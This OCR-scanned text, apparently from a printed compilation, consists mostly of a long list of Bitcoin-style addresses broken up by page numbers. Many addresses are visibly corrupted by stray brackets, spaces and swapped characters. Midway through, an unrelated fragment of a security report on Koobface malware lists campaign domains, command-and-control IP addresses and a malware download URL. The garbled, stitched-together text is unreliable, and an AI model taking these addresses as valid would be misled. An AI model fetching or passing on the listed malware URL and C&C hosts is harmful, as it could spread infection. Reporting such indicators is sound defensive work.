1BCWrot1YKCdyV4C6aG4fNi23cThdLN2fn 
1BcWuWf4YZTbKb4s3jieWr7qYJPeg3aika 
1BcxSeU1lghEa2S5MCLRSbZ2UTEbiFkP7Tfg 
1BCyqiQYwmC75CkrnsvKJBz7B4WDnUpkDH 
1BdLHdMCmT2amdAQFosqi7cDWReecaMx33 
1BD1pqQsQ8B4gkCvfEbqZi8s8AAKU25hZt 
1Bd4RUdSSE9Pa3YxMixVZOAQSPAjKY 6dF4 
1bD6fAMGGB8D86WX2v7Vr9T67fQWC2VDt 
1BD7PqvhQ2JnVkgRNBcDiDm4Sp2BtVJBK2 
1BD8RkXnDYmZBVBsf8bJznmUcGeLD22yS 
1BDA6x3Mi8ARhqTFDhkFKGRT 7LV9cgjASM 
1BdAFvkutkAEjGqoXeimbfiQ5SjioGgWDc 
1BdBGPfN1gh5yNKospwsiuPNvYs5SaxyvNi 


25463 


1BdbVK5o0fRobHr]vVg5aYZc4w9mvDP77iwW 
1BdcdfpmeyUEdEHeF XCfPaXR8jf1BjSk4z 
Lbdcpb7QcHrxZ8dt26MTVrhusC4CHGxz5 
1Bdd98uMB6Jzd5dQEa5AjUVmekMtgQDDX3 
1BdDzuq5opTUND12FBKLSk592K5sc4xaBF 
1BdebzFRdpcL1S3wkVSxoGvC8JTo44SA6m 
1BdFB1MjZ252PdLdtvxXu9zfuxXYmr7AgSBn 
1BDGc75HxVstX1zqiYznKtyWGwsLENkISK 
1BDgUrXzk2kjJZFkoYGhk61DMoUzyNofZA 
1BdjwGxR3iffRiILFGRAyp4g5StDT XsB8Xe 
1BdJzeghx UHYwnHXA9KrNrLiByD3iFWooz 
1BdLjtrrEkgfJuyWJ6Kf1JXLE4xHh6xV6 
1BdMmKxXoet2xYHNS4yP8XtWJ3WyagxgkHb 
1BDP984DEogJRMAHCMmU6Z8Zkbx3ceAmwks 
1BdpTRgh68Chofi9TDJTbZ5pVFNh52vd98 
1BDpYcDtgzrFqVesPYbURYmACfuxijr4dn 
1BDS8bR5w7G8FmnAhWkvdTPUSnmW4KU5bw 
1BdthUPR2twQGWC16u1R3hTVYVGZM1leldp 
1BdUBrMTxLGwbo7a4VE6QZebU2CemD6Gjv 
1BDw336SKqy9m8QdhtTTtiVEQKP8DKPSWe 
1BdxRGcR9YFRQVCrjt6N209Pjb6FEMzpkK3 
1BDyDY2eNyyCLZAmm1YfqcBDJactwPESNw 
1BDZCEnen3Y1AaLRJLDwnSudkXoRZ28Yjc 
1BDziMhZp5K9sX3edEk4puS812f3e3eaQ7 
1BE2WHoWExaToK55wZr4CUdCAz9wpECBr5 
1BE2YG9ix86ZaVtJDADKODN6HYbXF28sF}J 
1Be5FEYLjZwU3GxvcAWR6bLdidsNWSCdsA 
1BE6BW4E04VJNea7ewuiU3EYLoKyGNGyWB 
1Be84485UJYAJcnFJwMoCXZWttNwnVt7nH 
1LBeAHEKRfX4v4zQwDitMsjAjWhyc3cm5PR 
1BEBC6morey1Et5Wx4ty5jQUARK61U9R9G 
1BeboUr2jBvynwdijJfpKurzpPXv8VE7Yi 
1BeBuEkvHyEH6sZvSswWbpYzPMHDYt9Moz 
1BEdumYL4BY9se3KUWkogmcWaJdcL3Jtax 
1BEe2rKR8KQV9VRMfjvrT QBtVYiIGvqeSNg 
25464 


1BEE3WAU4afjvM6ndWPyZosWnBhVsH Toow 
1BEegLjqJ7dNZLCRQKBRaky4beHHZtAhtu 
1BEFPmS3anwwuhipxtQFXSVYVeGsuFTqvZ 
1BEGLvdkmYjUwCrzmLVxFVjPE2gDNZEe2f 
LBEH4WZSHJghqd2DX8Ptqw6ZEytsk6pDCP 
1BejAGQBqH3k7wgVByiUL9CQqYsLXLcSTw 
1BeK2ed7x2LKs]xpb3CWGPvkFMEqCU38Zf 
1BemJYFTi7PXrWF4EF5V8iNxdwwReAsFwd 
1BEo4iuMRRRcsLaEoFnjrmuoYTEySMGKq 
1BEPv87v3MnB4PooGcGsyd4GSSEycSxuvg 
1BERa175FB3gXvnJFCZQd2BcNSugpmoEaR 
1BESWoSoqbFxCCd7qv1TE2LBj5m86VX8Tp 
1BETJ8rXYfMu3rWNDMthTuA3v7ALatFw4E 
1BEtXj4x3GdigeeE4KTPQfxSloy7MhXGFr 
1BeuQNNKZhFBhwL8hEdJtwEd1CLGsLfVE4 
1BEW6iNykKCDM4QoeNpCk20ejM1N10Z49Rx 
1BewodnANNP2CAWerGjKjz3QpzncRYWtWX 
1BflctdHXRhbT4eDef6hkCJNP48kVMHhUj 
1BflUHTZMBmw75CeWrSe1lLRXUnpSAZv9K4 
1BF3j9fZT6dUAZAvyEFMnvfePuk3)JN5vUB 
1BF3xhwXdFincvDBMheUHjfctoemM4zvwW} 
1BF5RUDrqxyaj2z1UH6cpghfTi2qUuinG6P 
1BF6dDrxt2L73PCdbkjBtt8n6pwSuer9al 
1BF8JATdy7sBlv8XEyWH3paRnfEQKgUvZd 
1BfaNXavVo7EbnjnNAQ3yBp4TdP7m32qSN 
1BfAymN43CncWNpq63t4fa3J1H23ZcUdE6 
1BfayzsaMUaQPupVrF8yLotLjQF9sKzecn 
1BFCxUddh4P4PHJiWLahti6Fjy5k4FPTb7 
1BFEYJLEtcKTZwjyJ5b2cLWkp3GXi6RVn2 
LbfFcZef3Vy1weznhRBDuVcCdiPAQLFWP 
1BfhLyCWelkbbQD4zkK5Kvizfm8r9FcwTyc 
1BfKHkKqUQLMpACKE8Nvo9NJVyC1ld3wF8Q4 
1BfkKQEQc29Q3RDgm1qGefLws5ghStzuP6Xx 
1BfmDA4mzytbdAN5ixRXHYAoXvsiiUwCiM 
1BFmML915ecaboHYZShHGW7mamM4f7WHqmAk 


25465 


1BFo4nbD46FbAKuGkpK3TORMHWYhyxkYA6 
1BfpJufL6jGPhLPB2x3JC37gfeTWkKujfiV 
1BfqPwg9abgkpsPrBLsjQnu4EKrqyYjminw 
LBfqwALnxXJWry1TWMLEX7xz5aCtZ9N8kBv 
1BFrLFPaZ82PEm7Htlvs6G7EvDnt37N8VQ 
1BfSBE6wjLAKNGG1aZDkihT LavMUn5dgnQ 
1BfSf7 mMnN9YZUSpb7ug1l5uxXPgDcUzjtsoHnF 
1BfU9JcLsw1fDnVFqNNgq8yF6hBe3eWZakv 
LBfFUHQSMQSwQTYz48PGuxX5ZwZPb8PSumqsg 
1BfvjLLRO8W4wtPAYDjSGfn9xAotwp3KXN 
1BFYUD3zDc2JAmwhzBDoyu4beiULiqFW7v 
1BfYwruWS2AKykyfxXKQtxRPQ4182jGLGU 
1BG3dyfpsFefRAW82W9SrE6mx5ZNHUPmtx 
1BG47vkAY7XvQxzaAtkgPt5hGPQ9RBsDdS 
1BG4G8XFof1j9PsJYZGUIAEjtFc41fqqr1 
1Bg538nPv1YUv5EuFWbkKtKqVkBh8qFjAr 
1Bg7wkqTmikn89yZh9NCJuggLhzT2iRM8R 
1BgaNMjttxe2dh65det8qZWBqU7E7H9eXD 
1BGbubgVRgwvf4fHVgCaUi5vc5YPeRohhZ 
1BgBX4AHDDyCNaHFUFdgn9HpUUbC4uNGuf 
1BgcNyzXHosJvMHetJrCn5c2r72Xx6jtVi 
1BGFnsBXGLBYumTKYuK6uD2DBCoApoavcW 
1BggPKVWyqygBkwVWkLJFGJppCxXfhHXa6h 
1Bgh4ayykWcLBf5T4xY72s391yreUVpUdE 
1BGJD5NkGCRzpvhTJQ4o0J6RsPQBc9HjsZy 
1BGjfnmNsTamgqhUBDGtYaatVKduss18uS2 
1BGjxrPDY4duMGv88xZn8qDNgKM7segHUb 
1BgMAj5PrsLSea3hqn3sjWFo4QcsSeCV56 
1BGMxoZkzXKe4sKcT 7atWqFxctwkeSDtuw 
1BgngzFeZ1QZzW6gaF8FumGrsmv5k22GZ4 
1Bgo7fW40F 6SwJ1GGj2bYYnkrByFhfhRL5 
1BgRb5VQ4aetvqmVCsTUBkE]3sg9Y6QmZL 
1BgSZRc3bPD8)fhrcXLSyLqBxaLT8UyTqZ 
1BGu2ps784xWxQcr1W83kKiUnPsiLaSZfz1 
1Bgu6x4xXfArzyH788vuuw4tyMcBfT 6htrH 
25466 


LBgwEzKhnTFWeGzWnhjbX55X2GcU1jR27v 
1BgWjmZjizWxKJEx2CbqmtQzMBNJNxedf4 
1BGXqSRNsuSdiRg8uncjVijQ8pr21ghoLms 
1BGXsfUS7GCACZuNFJdwSro1YWR7F8BCEE 
1BGyXwMcbpFJ1WyTV6cfZ3tdNmZbrt1lvGt 
1BgZF1STC2cVLo3z8FSTLfErd2kyDLjivo 
1BgziHV9HcYBQqgezzkuvrUdaBwg72s5jxS 
1BH2carws6JUYHNKBjLaqjH8gUC9tvSYtJc 
1BH3HoibPpcY9th6x6thKssup8kPmsroxv 
1BH7gUKtj8k6eQREuxVefSDsj8MHBCx7zA 
1Bh7kzSkygL3cZrh4MJwkwEYBrEfrUmuHo 
1BHeyb6TJNPegxywwYiVeB4elviPUcwx6E 
1BHfipZfWM 74NhWnsLDCVRiZt8GK1TtgPy 
LBhHXKqSPZdqxE3PLiiP5nh30wCYS1125d 
1BhK4ZeYYhymbU4wrYBaQi7gky6919th6N 
1Bhk99vzNLklgfsWxSZCDZfuizWpgbjFDq 
1BHkG1zZMXr2bj6HMNj5kv67pD6VSE6trDP 


1BhKg4A2NWQnwm2qkp7hKkAabLNAp5RoE4 


1BHoXykUy4B3WQNnvYcNFf2mkezé6tsbFdu 
1BhrC1RjspHUpAAtb] 7Hh5PnZk6Eskkg6o 
1BHupxZ3ATf3ZLMTEDD7LE18LeTfepftVh 
LBHwiZVPiNiSy4mFRjxDC4w7 9vGqt93wVX 
1BHY87FPvfngbmsTDuTsKWXntPkUiicLZM 
1BhyNjRFU1Ywa6LFREPNetexs]yArcoA2p 
1BHzeYDZmzZNVutHxz5Du8nVArF5dgHN5p4 
1Bi2c5UPK5taPvHNxwYmAEh58Xf98gEMVC 
1Bi2J)WqZgZuVGgWT998v5WAQhX8zR3RKwi 
1Bi7682vaCgYpxBUyLimBDm2dxd3eGHnMVv 
1Bi8M9wx1lLQsUnCvCAQwSDgh7q50D7ATC2g 
1Bi8VWVUH8PYkt2rEDdK5FUPkKtP9qVN1TB 
1BiBdiwwCajjSpCgZTUwGo3HCmNPXKuhsn 
1BicnQeUgjLtV3qtNLjA1DAYXJ2TmyFqcT 
1Bics]yf76tTY9dkakFO9VAHFSnZg27dPXw 
1BiCzibCU5aR2JyHk4DSutGkYKaSG/7vLje 
1BidaVkDaJaWXJZH8ZtVsjliETUyqn4Fxq 


25467 


1BiGaJAhufhiTvAyqkVMz2rup65boTR9qv 
LBiHtFRrTJ7ZqzajJrELUt9duSpqBXwuyw 
1BiLwzcBHyLJ7b551iK44nXFFiuptgBiss 
1BiMtcJTA2MnRvMsSECWU3EMynE14aiJ9cQ 
1BipzqaAay9SiTwbFr97TK4z7wi68JZBys 
1BiqzT3E383Ubd2klauMXeqjb9Q52LPuYr 
1BirJyfJFG1Y6YNS955CUxp7Vah4F7FYRK 
1BiuYJ5xU7KKrGeukGjB7AUhnt42rsAC9g 
1BiVuFq5HLkZpaTR2kCxkMUuDHPwMj3251n 
1BiWJ1kU31U55L7V8UQDyHaTCjB1XT7EQB 
1Bj15pvBnyffDJ9ssUDD5iEv4GKPFs5swWW 
1Bj1EPeKa5mYoxqkH3zxX2kgDqgWC1B5RC 
1B) 7LZ1A8NxGC5us8jGJ8Vn3QTchSVjwgH 
1BJaTrbTiICPcgCnCs6d1A2czfycbyopAfe 
1BJOWGSNMegqlaqpfvSLEqLV8TqA2ktLvxMQ 
1BJbzSj9sdcSNpV2TJddSbpGRnSxPc7Vuz 
1BJEDNBoK9PmgAxEqvRcgDNjSpFkaWzBj4 
1BJEKEi2b6L7B6zLPz2VjxRHvhqqd3iHz5 
1BjeTtNb4aPVWETGkweLbCKXCmtcG3iEDw 
1Bjf7BE8RC4H7vHvxXaWeFVJJgQZQUgEuRE 
1BJJnmeY4SK4P7BKNs88wGTE7UUHxBgx6e 
1BJkoo5MUgtq8vJ36CaeQ84ktDajv5DvXL 
1LBJNQN8Ria8tDyo2cDu8jPFH518JrcnZsL 
1BJpe9jYHJPnRxoL3qqqtuKnbmU52Ym4GU 
1BJQ8a8y4okjqpe66coLhLpjuk9ZwTGQS] 
1Bjqrj 7p9MT6EHUKPa7YojjHkq7qiuDCQMC 
1BjraLcPoBQbprNYcpvyht202ZQP8gUP3V 
1BJRmMxcE8NUW2P425us8Gks9hUekc5Gdt8 
1BjtCdhia31fsFRZuj5DXEiBFNKK20XmU7 
1BjufL3ZvtQDzorXEVnoF 34sLsRK5E3vzB 
1BJwV3x5U7QpDt5KNnxKs8gBk7KP9OMGwTv 
1BjX2PZWS5gPfwEKNUQ3Rpwwr7pi9fr5kq 
1BJ)XD92PBG6GFduhqmhUKgW6bZeWDshWus 
1LBjxLOnNVsGTNwff7FhgkbNJEpzFnxXY5iH 
1BjxmmiPodBQmvoMvRLfY1lyAwRo1E64JTC 
25468 


1BJXrjjSjY3jJATYpJ9QN9OFRREEApPE|jh4ji 
1BjYgiKHcagUeukep4qCb8CdCp5Q56Ysco 
1BJYUWWb5GNyqkVU7cZ8ps3WP38f81T7V2 
1BJYZXZSZLWBj2Z9sXY8ES2Xrzp7QaEQct 
1BjzzQ3fusmAHtzSUQzc9bmh1R8QnNE4HT3 
1Bk2vGUnxQmgEr7RRrJPEHB8NX1cpfYp8s 
1Bk38184WY1cspo3N27SsVcqCmAjwnqVJz 
1IBK6ETAJ958ZFEqsljcKYuh5dKyN1Juw7y 
1BkaeLaMewymrYBnQDb4owJyLqQqwVHYmH 
1BKaYjHPSn9WHJgNNp2MddfxiPkKBTmPhz8 
1BkbRh9HGYOWKN6eiCFGmwYTndxvSbKvP7 
1BKBYkpXfiqzudsTBQLDu2Xgo6JjoHTPnU 
1BkcbCQnJ9MmRViZAnYr88exXscpcrohDrU 
1Bkcc9NP7HVWmBC71SSreNVaPKs]r7AEm 
1BkdvnZ65R1bzg65DLUiTbjifRuvf2JGTx 
1BkfqL5cpgWb2LwcsuG8e7TfHwUat7mXkD 
1BKMG4n23GEBXTEHr3VrNkmCtXnzLbSR5q 
1Bkq2Fu1lVZCG9c9hg TahV6yAkC4Rmm8ypG 
1BKqBpYqQ947YmZugffX8huTmKepejtG71 
1BKSaTJLUisePFWUeFLVYUQxgutfKtEjQn 
1BksUSGkJQf4HZKvK6wtgbh32DbiQFAx3E 
1BKswNiwgfhwHgnPugj1lUu4swudoU29ZTx 
1BKuz4hFS2YaQG4JKFWkDaXjyYituSJfd 7f 
1BkvsUdz4ZN4sgAcVTxZ669AZYS9IGjQGdo 
1BkzeUuorY2DTmdMki2uqgCxawXCVYrBTfC 
1BkzWFnZLSABSiz1GBnFqwDqTYbcHVM1R8 
1BL3Z8ujnuy5g68snEPSRZUiqZyJUKQa6a 
1BL43PkKVEChXq219yrPyQd672AjYF63X58 
1BL4rcbud9MRTADxTwhbDUQBg7c2aHdWJK 
1BL50971eL9L4K389eZxHS4brhQvNyALUq 
1BLA6XsqakbAqKugV3VpjSCqCW4s1NDza9 
LBLbSqTjmw7STJQkVBtp2yrvAi7q64jh3E 
1BLDHZRbdsT55BknubodiXE9FDHL5En2U1 
1BLe36e6SYWITKEQSYQRN3CEGXFgR3d3T5 
1BLF4RT1VqdbE9hSDgEgbBvw)JFdvFQZxMt 
25469 


1BLJi1Lf8FnGHb3PTyF8TWBmDtdgsxvRJo 
1BLmeHbJZ6UVChfSAmMUUVmMC32gpbaoX2R 
1BLR80PVoUqgx28iABMeLAVJWnrlup2wsKkKK 
1BLrbTuUQTvbvfT90pg2Ak8WsisWbnCcGM4 
1BLsxiDRMeQe7MRs1BZxHp5mQnSQFw972V 
1BLThYE9sxK1lohGrHHWBRDzhhUCnYFtCkb 
1BLtrFQpixtNPJx38935JLhkunh3hxrFvX 
1BLTVZZo1EA3M4f7FAc6wRp5jcjDW7HtMH 
1LBLuiqvZnSu6PMcjtdFBpgyjudtHQfzusB 
1BLUpRqcokbejm1fhCbL6UweyZkimKtcvx 
1BLxiekcmYBUUKpbX9QofKVV75j70i6yTA 
1BM22BGvKCRzBfffaEowXy8WH4NMYDm9]Jb 
1BmM46mMG4ZSz84Gs63QYiiZK8rvSYXZQwc8 
1BmM4zBNZ3gTfeP9ME65Nb41QEcjxdxHXyG1 
1BmCgQMbgnyaxW4HcaTmuQQWZADnxtqwF} 
1BME17pjM7ABtZi9XiBTxJFWRdKva30voA 
1BME7dnGd6d6WDxnMcoSsgCR7D7kVvV8KZ 
1LBMENw5uuvRtLjRgUyQNFWyk6Rh9a74re2 
1BmMGjbRimQHVXdb46Dwgc3DTbz2SFLgTR5 
1BmHRpSfyEdLXv9Q8ZriWJRwoMxxX4eUmH3 
1BmHSu9rWfhAt2yShnuh4e8hmMdvN74Lvv 
LBMHZgKGaczNQ6zZHhsLZr8Sz2zX41PFGoD 
1BmjBBQEuQQhygYLIGNSDjTyHMbqwpSVi6 
1BMjQCNU3wzpfZE62PDaYdLV5hsAShXyxX9 
LobMkNRjawSPUchyWEpKJGBzLYXZrRLXe3 
1BMornWKqyz4pQTk4TkjugBHXnz1GJ87ch 
1Bmp99DdYtmkKfPpucKvatlbD6EPMnsjJvhm 
LBMQuWQvjkrMN4ZURSUGH4AWSpCCYLRZP6 
1BMr18W5BkDZSPMDzxXBrxjQZbofUJ9P9UV 
1BMT3cparUZrax381m]Jpy3uQdgZxziaUcp 
1BmT8wyDdNj2MRTtsJNptQxKDe1ZtPsw3s 
1BMtsceXWuWH1X54ywfc6gsEKb5DdjxyvP 
1Bmv2JwALHztlmNeAKGgRWvJEZaFTR2UpQ 
L1BMVDDuD7G2R)f5B9cf3fsPYSh5 Te6nJ1G 
1BMVwayzQWs1welrxXRwJ4zxfDY4EDcK2iU 
25470 


1BMVXUrA9dwGGWKGNYjBtjU93vCgYDeupD 
1BmxhBoiMELyJdnAL27dYvYRjvESw1lhyHN 
1BmxTvWfw1lit9WZLmssVv524LVHC3zrVLS 
1BMxzmmW2iiRSBdDbV3AEPUAVT8c9EZ2iLr 
1BMYae5Q5wszSiFb7HSJjgKC18D4GKfVRE 
1BMZYwaunwTR8W2MCHAoy3iHmVjfS35H7h 
1Bn2jNYajwQRmZ2Mc539r56FkJ6kAeSb2n 
1Bn38Ud2ktszjocELMtVCqXMaYkpHyDelh 
1Bn4bwrVWATUHceModQNjrm9o0ApRgtsHYK 
1BN4P5XZmRLnNE4GXiwUMUaWthMShEs8UPF 
1BNBtmAohnVUscpfbq9tkjfzbflfKQUVMm6 
1BNDLyPQWZv5VexbtGko2kKMVZk8UU5sAcA 
1BndvUvPF82vCBsgDfRaNkZWZUJQNNBEm1 
1BNf49Sv6eL4eai2TDBvZvVh9F BujdCCv6 
1BnFsy5C30HQZsjJUTNRBxvntAe6u5SJZ31 
1BnGeNEH1XDBJujk6NKzmBax8CceGipwWw 
1BNgjuxfpXapTObHhDkG5SKW]gXigSZvre5H 
1Bnikskk8eCsPCeNHS2UWxXMUziIMvW8HeE 
LbnjKMRENNUsiPXbj9rJ4zPdXvfxnQJuY 
LBNJKP1iIHX22rWBTfgHf1LxYmWJHiVXfcw 
1BNkSeY2sqqEDW5sC67r17ykoRkKUPyfcx 
1BnLzkPBzrM39xfxjdU8cZz1p2aev3KVOW 
1BNMeeEHYUK3j5MJGDZAN8Mk5jRRas4cFH 
1BNMKGQYAre5o0FzycJoyCAgRSWwn9376U2 
1BNMZp67L9KApj9PgGnZfMuddrGxzM26H 
1BnNGZ4DBZ4ft96Nmo5uWuRVhXEkaw5t6y 
1BNovZQMPrgKjHPVLJ8DbgDZjEYQwCRRUr 
1BNr4zVhZGi9sZj8e7A6)JowchLuEFckGc 
1BNrygi5q6A5DfzZjxseqQ7o0qQoL8ZrQxE 
1BNTUEfoBZgH6kSDUcWBRrYzrbMi885Va9 
LBNTY1lvghkUBEo4snqMiRhXYQBuZBaJX59 
LBNtztUZYAJiRISW16cP77b9mxvyd4pgZE 
1BNV8G3WrZDwGJCUqbuczm44fN9DXqUHbW 
1BnXYV33gzdn4A12SZbkZuVxwy1n960108 
1BNYbbH4TAYsL60yDdmecnrKK3u7eA3ppy 


25471 


1Bo2jetDDvDawhvr8GeV1zCYNeeQ8kxPmd 
1Bo8SKsUzPyK4cUQYRY/7pfBzsu7tt7AFEp 
1BoBGhwZSxXybZGHaYCziJcps3PknGUMPUb 
1BoCmJh68myjAm5qCMm6pD2R2cvgDZ7fsG 
1BodQnpx9janrgfdnJjemgywfGY1S6dAdv1 
1BodVDsFzvFN9notqz22bPEONXZJiAg5SR 
1BoENqcPy7u8V4JZebRdhkmnDrQQtdnTG1 
1Bofuqy3vwLmMWt53tRFEjJEbUhYqcK4vhbW 
1BogBnvnfeeK3eCxgHGoMAZmZg3zmmUH57 
1BogoPcqRv8vvefr2P4zZK81nBxw5urw5Zp 
1Bogsbfz3v5Rpwtr9H719VATMisfnb22xt 
1BoJ3WSoowNt27KVUK3N6bf46yX1svhQwb 
1LBoKChWfDqBU6TDxiVui2yEjLnh6hVC5Lh 
1Bomm9]b2LG7ftzM25DPuPzLggmNPKou5] 
1BopwZoHSnxX4MLCgMSWnQVimBe2zzaSj1w 
1BouhraF9SBmMW3Eak3MZaEh7xeWkkWuqlu 
1BoY5W4hnfCmaqdstjBL5KbPgeyCkQ39JiwW 
1Bp1Ya2uFgyqB91LBLkrDha8)xRfakjjQr 
1Bp3rJDJVSnMRQDHCxmh7BpLUmGU7muCh8 
1Bp5pwmohv4jJf3carq9pkMtlhymmu4RAXd 
1Bp66Emy8xcAUGZsv7jQVT9ISG6BQ5hYzv 
1BP6WLWW1xR9riFygx5mua58f5ASB7PB9f 
1BP7yH91jjRdtGYV7WpHcNiBXAk3R3UEet 
1Bp8Fya4qwBqLpzRCKaFQEdv4uui9raFTh 
1BpBb4avQkFQh3ca8mXsSAZDJ18abwgiBK3 
LBpCARY47fztFkFCfmTKFOoCMAPCYfra7qG 
1BpEZ9ee6N8m2HSsjyjb2aoby4KEZ1Jbr6 
1Bpf74vynSgVFZQgx2hGjFKPapPhD6UHpb 
1BPF7DEHOuFYYYMFi4yQdgi8Jw2wfstkKkS 
1LBPfCNdPb3Rx4DWw9SAk5]J4zCBvypbmaqPG 
1BPfPa8erLmMh6wKFc91laQWNifRIKIMEYWg 
1BPgvrfempcmv4vLKmWcyiERPSdZzxXT Ire 
1BpiYoUcTYSdup6LSthvCuKk4Z3v14bfJDB 
1BPJSfJXxCKYv7UN4n8UgoDYVi95don4TnD 
1BPKDsfsPR4xmrS1Qsq9xWe9dAvdq97xad 
25472 


UPDATE10: Two new Koobface domains, and a new redirector are in circulation across 
Facebook - rect08242009 .com (61.235.117.83) and pari270809 .com, which redirects to 
masa31082009 .com/go/fb w.php. The "[2]fan club" has also introduced updated the mal- 
ware - web.reg .md/1/[3]v2prx.exe. 


The domains, pari270809 .com, rect08242009 .com and masa31082009 .com are in a 
process of getting shut down. 


UPDATES: Domain zadnik270809 .com - Email: baoyshzrcwmraq@gmail.com has been 
suspended. 


allavers.org 


kallagoonl13.cn 


kiano-180809.com 
61.235.116.0/22 ——Ai_y. AS64603 


61.235.117.83 
pari270809.com 


$uz11082009.com 


xtsd20090815.com 


UPDATE8: Koobface reactivated itself once again at 61.235.117.83 - [4]China Railcom Guang- 
dong Shenzhen Subbranch - a well Known Zeus crimeware C &C, which is also apparently used 
for automatic hacking of third-party sites through [5]compromised FTP accounts. 


2550 


1Bpkq38UJktW5dP5fXxXQilLqgRYniRHW3P 
1BPLJw9KeSRfatYB5f4AJ]NoxVWZiahYbZ3 
1BPoM24SSih7Q3Dh3CAdn1RE7jjdQVul4q 
1BPQ7nZ7Ae9FUFuCJS5KUaUtKLU4Mv1dRV 
1BPQyCrt5Jm1L6gALFHNculwawH6Tb4UQM 
1BpQYxNuZRUUK30N8mPKVHjRXU75SNapKB 
1BprgHdcx25v6jAVQoiJtkdKp8e7khsx13 
1BpsoDaDsTcpvCpCMfnz8jqqLjeSo4FrkZ 
1BPvPm8D2xw1X8paScZDSLRZHJ5qmxquUEn 
1BPvuQawYkKhhng8kjPNjYaGkEnSd5HLt2S 
1BPw4XABBGR7veptNpUiPPSYirlYq5bw5i 
1BpYegukTuF2d8bTKkdrVjj1Tqg TuxXQeDr 
1BPyPmDRGw2FWL3BNo7MYTsShyD3Ro7EpC 
1BQ3k3QLTBcc5iAfsrYQwiNnmWG9BcteBu 
1Bqg4WSN5AEV4PINXxH8SADvmVtCC5LMjwN 
1BQ56TkvXpLPCK4xkv9HpybBY7Aeg4WmEP 
1BQ5D2p7DNGuLYfpf6L17nPmATfSvUsRgZ 
1Bq5rkKfcDg95LUCbGAYZTC7LUA2LJPTJxT 
1Bq6UcakLLKHQihttwQQjaoSHFci9wGTHu 
1BQ79Jw5rkbEaYgH8umHX264ZMuFLYnNRZH 
1BgAvm1UYMmZ1L1BW1YeUrWckC6Ey8mjTE 
1BqbXjugzcsdcGHRalaz5F3rHvqDTgVRMQ 
1Bqc78hgPmxmef7impou7UHSAZZmvkMZbg 
1BQCBMeJMbTrcof39jC21gjFD488arpjHF 
1BQCeUDCWw8FgxoBit8Wzn69nzRc7bR26S 
1BQD4cnRLtLJngw8icUBtmPucyrVAhw3c2 
1BQdY8vXCcZvVWBVA3LEq4zTyZsnfwIKLvW 
1BQEZM4)]f9eaf5uNhd8eW 7apEnE3xMUGR4 
1Bqf61)TdjuahEHFyqfAE54qTJQmXssBys 
1BqGRxiypkTko9Eni4sJhTi9ZLLZNZV5iT 
1BQGTXnqF1MVNwtnP8FCD1e7rnpCwjozWw9 
1BqJ8dfoMgKH3cGN1RtchhrbMgBQyhwzab 
LbqM4dyCkEAdy6r6DHw8mQndhxmnRb7Qh 
1BQqNrGCeMK6uFfQ4PrQ3bXZqzaYbpDy 76 
LBQQZhHMDAjBAd1xpMVPgSQkmFRaHf5n8Dy 


25473 


1BqS8dMRACgDYGOFjEMAciVmpadfkfB6XQ 
1BqSXPmuPv9cwoAXtAzzBU109Ng 7xfJ3mf 
1BQT6tBddrvsip9vvfH4A7nmxzgFv8m85U 
1BQwREyvrif5aZ1laE3MFwaQwZGf3CpyGkH 
LBqWSU2Ub4kCJCv2TTTf87zmgTpGRPspuG 
1BQx5mUr2yEVAmTyuyExDGxLXn2J2wsbTR 
1BqzgHVZKCUpFqF98vVQQHJPFEJKuR81na 
1Br2W3Q1DyxFaqgjoinFy39MLGbc4ssp7ab 
1Br3QB99Y9TDFcP2V9pRZvVEE2wvfB75H9 
LBR8hKA4fKYFJM2e87sSH1mXagUGCYqaTUP 
1Br93fqUYGYxpqcLlggPXXW8yLxvJNBZHU 
1LBRAFXVk84eQwVkh1sQiaYPwETiFvxwh]f 
1BRBTG4cKPWM4SbumBo6hhBsDTy4Pwfamp 
1BrBTvvfuWEmaLb95qn84N8UhLQaEJOWYB 
1BRc1LRUZHtSSFHzfvvmrQbP3LsPP4DAd1s 
1BRcCAabovrgG4LXRvoHw5cV34t718Lnig 
1BReNYDMN68cKNiyLAcMojKLoT7eTtKKWK 
1BrgEJDFFHmyU8mYk7PLggrivZwesgzyAy 
LBrHjHYHNUAjG2Nbez55QL11pT82hybuPw 
1Bri6CXGt2AaeUWzw3iGBqd341JeWUFuw2 
1Brj20L44iyj3iVyEht3nCBfeT9CZcnU4n 
1BrJpk747K1i63LjsttpVbJtqF pkphfjB) 
1BrL8NGSR7YW)JcrrqBn54zX2YVS9gM4Kb4 
1BrmGtq4JLCnkrpA4RfhJppnbQrkKcLTUMk 
1BRoFsqo4H9cv8jJh3TzS5SADSUqQBw5UKvT 
1BRPSeHLZYGPPdbdF 3eyvmiWfjZB4E2mok 
1BrS1FvK5dzvzEqDrA9q5yRFc94Hm7PSHU 
1BRTH9GKGAFdtXvds7JRwWF7SC4sE3YLcPY 
1LBrUEEnf3aZubQkcdtJq3YLWxtCYRJuFZX 
1BRVj2w6vo5W7KHq9H5WRS5CB5vg4vxXbQ9e 
1BRVmuxAeAvDTeNR7QowT 9gquoxXhoKuvRd 
LBRVWbMhEP2WrZ9n9nBPf21xEVjN2SBV9A 
LBRW2UxDMX2mNPz4Q8V4N8HzhiYLBB7DeH 
LBRwuuhHkb6A7icX4imqlEKt87N7PNMhho 
1BrXhMnCQ8UEYwiumVdtGCFRGaCW1cLmoH 
25474 


1BRXvhirkcBoaEPUA1g35LfCx1fc4FnRNu 
1BrzinNBinS5MSRHDrKCZ2JRsVE5ry11Vs 
1Bs1sFIBGLLqd4Rk7RfU4yUxBSB3uWmASQ 
1BS7JT12m7yAo5s9qcFLH2WwCxa2zZMBuwS 
1Bs7rcmAbTDeRLaKHZw2t8EQSLjHtW5wxN 
1BSAoc5SHfiGGMRESdRKT XdhHBkDyGyYj51 
1BSc7F6L6gzZ4PMFji2Y 1RDMoBRfKGPShao 
1BSE2poGSimrR192Hq6KZHzgi43jwn9tVZ 
1BsfpmvYuGe8Djx9c3wyGccBYx1dECtUGG 
1BSGbJ1rzTpeor5jrvvamDQZ5XUxjpTyP7 
1BsJBwHcghgUyw52JEViw3GriMRb67WCuE 
1BSksCmNrWtQondwGQ4DVcTaB8UdQugdjH 
1BsLJ7cT9bjVHB6tbiKTAfxvGT1LSMZTYkf 
1BSLREmMwK6xEtTFUOUXLGkkxFgwzUjxXc7y 
1LBSNjGqcaCTwH8gunnJAMKRDTtQgYxxzQG 
1BSo8LAOABCxp4bXWy3Cmr2kpYCoVs5Mba 
1BSQV6N4xgdTkBx8afZb8Fd53Smx3E6W3n 
1BsQZo09vzdGABdXt5p TwsFnB4xJETemHta 
1BsrQC9MzBQkufZKfCiaGe69PrCTfec7aXx 
1BssjJZHNW9GTphbbUpajT8UN1LedWuhXEK 
